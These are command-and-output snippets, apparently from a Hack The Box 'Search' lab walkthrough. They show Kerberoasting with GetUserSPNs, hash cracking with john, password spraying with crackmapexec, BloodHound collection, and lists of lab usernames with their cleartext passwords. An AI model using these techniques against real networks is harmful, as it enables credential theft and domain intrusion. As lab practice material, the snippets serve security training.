This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ crackmapexec smb $IP -u Sierra.Frye -p '$$49=wide=STRAIGHT=jordan=28$$18' | |
| SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False) | |
| SMB 10.10.11.129 445 RESEARCH [+] search.htb\Sierra.Frye:$$49=wide=STRAIGHT=jordan=28$$18 | |
| $ crackmapexec smb $IP -u Abby.Gonzalez -p '&&75:major:RADIO:state:93&&' | |
| SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False) | |
| SMB 10.10.11.129 445 RESEARCH [-] search.htb\Abby.Gonzalez:&&75:major:RADIO:state:93&& STATUS_LOGON_FAILURE |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Payton.Harmon ;;36!cried!INDIA!year!50;; | |
| Cortez.Hickman ..10-time-TALK-proud-66.. | |
| Bobby.Wolf ??47^before^WORLD^surprise^91?? | |
| Margaret.Robinson //51+mountain+DEAR+noise+83// | |
| Scarlett.Parks ++47|building|WARSAW|gave|60++ | |
| Eliezer.Jordan !!05_goes_SEVEN_offer_83!! | |
| Hunter.Kirby ~~27%when%VILLAGE%full%00~~ | |
| Sierra.Frye $$49=wide=STRAIGHT=jordan=28$$18 | |
| Annabelle.Wells ==95~pass~QUIET~austria~77== | |
| Eve.Galvan //61!banker!FANCY!measure!25// |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Sierra.Frye - $$49=wide=STRAIGHT=jordan=28$$18 | |
| Abby.Gonzalez - &&75:major:RADIO:state:93&& |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ smbclient //$IP/RedirectedFolders$ -U edgar.jacobs | |
| Enter WORKGROUP\edgar.jacobs's password: | |
| Try "help" to get a list of possible commands. | |
| smb: \> dir | |
| . Dc 0 Fri Feb 4 23:01:45 2022 | |
| .. Dc 0 Fri Feb 4 23:01:45 2022 | |
| abril.suarez Dc 0 Tue Apr 7 23:42:58 2020 | |
| Angie.Duffy Dc 0 Fri Jul 31 18:41:32 2020 | |
| Antony.Russo Dc 0 Fri Jul 31 18:05:32 2020 | |
| belen.compton Dc 0 Wed Apr 8 00:02:31 2020 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ crackmapexec smb $IP -u edgar.jacobs -p '@3ONEmillionbaby' --shares | |
| SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False) | |
| SMB 10.10.11.129 445 RESEARCH [+] search.htb\edgar.jacobs:@3ONEmillionbaby | |
| SMB 10.10.11.129 445 RESEARCH [+] Enumerated shares | |
| SMB 10.10.11.129 445 RESEARCH Share Permissions Remark | |
| SMB 10.10.11.129 445 RESEARCH ----- ----------- ------ | |
| SMB 10.10.11.129 445 RESEARCH ADMIN$ Remote Admin | |
| SMB 10.10.11.129 445 RESEARCH C$ Default share | |
| SMB 10.10.11.129 445 RESEARCH CertEnroll READ Active Directory Certificate Services share | |
| SMB 10.10.11.129 445 RESEARCH helpdesk READ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ crackmapexec smb $IP -u valid-usernames.txt -p '@3ONEmillionbaby' --continue-on-success | |
| SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False) | |
| SMB 10.10.11.129 445 RESEARCH [-] search.htb\Keely.Lyons:@3ONEmillionbaby STATUS_LOGON_FAILURE | |
| SMB 10.10.11.129 445 RESEARCH [-] search.htb\Dax.Santiago:@3ONEmillionbaby STATUS_LOGON_FAILURE | |
| SMB 10.10.11.129 445 RESEARCH [-] search.htb\Sierra.Frye:@3ONEmillionbaby STATUS_LOGON_FAILURE | |
| SMB 10.10.11.129 445 RESEARCH [-] search.htb\abril.suarez:@3ONEmillionbaby STATUS_LOGON_FAILURE | |
| SMB 10.10.11.129 445 RESEARCH [-] search.htb\Angie.Duffy:@3ONEmillionbaby STATUS_LOGON_FAILURE | |
| SMB 10.10.11.129 445 RESEARCH [-] search.htb\Antony.Russo:@3ONEmillionbaby STATUS_LOGON_FAILURE | |
| SMB 10.10.11.129 445 RESEARCH [-] search.htb\belen |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ john web-servicehash.txt --wordlist=/usr/share/wordlists/rockyou.txt | |
| Using default input encoding: UTF-8 | |
| Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4]) | |
| Will run 16 OpenMP threads | |
| Press 'q' or Ctrl-C to abort, almost any other key for status | |
| @3ONEmillionbaby (?) | |
| 1g 0:00:00:02 DONE (2022-02-04 21:55) 0.4587g/s 5272Kp/s 5272Kc/s 5272KC/s @421eduymayte619..<5862548> | |
| Use the "--show" option to display all of the cracked passwords reliably | |
| Session completed. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ python3 /opt/impacket/examples/GetUserSPNs.py -request -dc-ip 10.10.11.129 search.htb/Hope.Sharp:IsolationIsKey? | |
| Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation | |
| ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation | |
| --------------------------------- ------- -------- -------------------------- --------- ---------- | |
| RESEARCH/web_svc.search.htb:60001 web_svc 2020-04-09 18:29:11.329031 <never> | |
| $krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*$213844b1898bc82613017cf146e0184e$e90c1f71203a24cb28824dab7d0a8b686823d5c64847f307bdea677ed1dac54ec76452208e1bd00e632f0136c3bd21e8e61812ee4031287bb7fb36d3a932e5d9e51adbb898c7ce6bf21f6da4910494885e1af0cd1771358fd105c96747000a7d9197ddc5046593a756a0846140031c75162ec4c8258d3388fb5d76466d9d8c35bd782088c8983f1da27b8a373999e2b2ab01e6607f31ad1518db5f527789dfb2682dad92250e987251af7bfc6433c6200680d3467d690b77ad3628055b60a7e84980c679e867ed924fbfb37323cc57 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ ls -al | |
| total 524 | |
| drwxr-xr-x 2 oxtd oxtd 4096 Feb 4 21:26 . | |
| drwxr-xr-x 4 oxtd oxtd 4096 Feb 4 21:26 .. | |
| -rw-r--r-- 1 oxtd oxtd 204543 Feb 4 21:23 20220204212118_computers.json | |
| -rw-r--r-- 1 oxtd oxtd 2690 Feb 4 21:21 20220204212118_domains.json | |
| -rw-r--r-- 1 oxtd oxtd 96806 Feb 4 21:21 20220204212118_groups.json | |
| -rw-r--r-- 1 oxtd oxtd 218652 Feb 4 21:21 20220204212118_users.json |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ python3 /opt/BloodHound.py/bloodhound.py -u Hope.Sharp -p 'IsolationIsKey?' -ns 10.10.11.129 -d search.htb -c All | |
| INFO: Found AD domain: search.htb | |
| INFO: Connecting to LDAP server: research.search.htb | |
| INFO: Found 1 domains | |
| INFO: Found 1 domains in the forest | |
| INFO: Found 113 computers | |
| INFO: Connecting to LDAP server: research.search.htb | |
| INFO: Found 106 users | |
| INFO: Found 63 groups | |
| INFO: Found 0 trusts |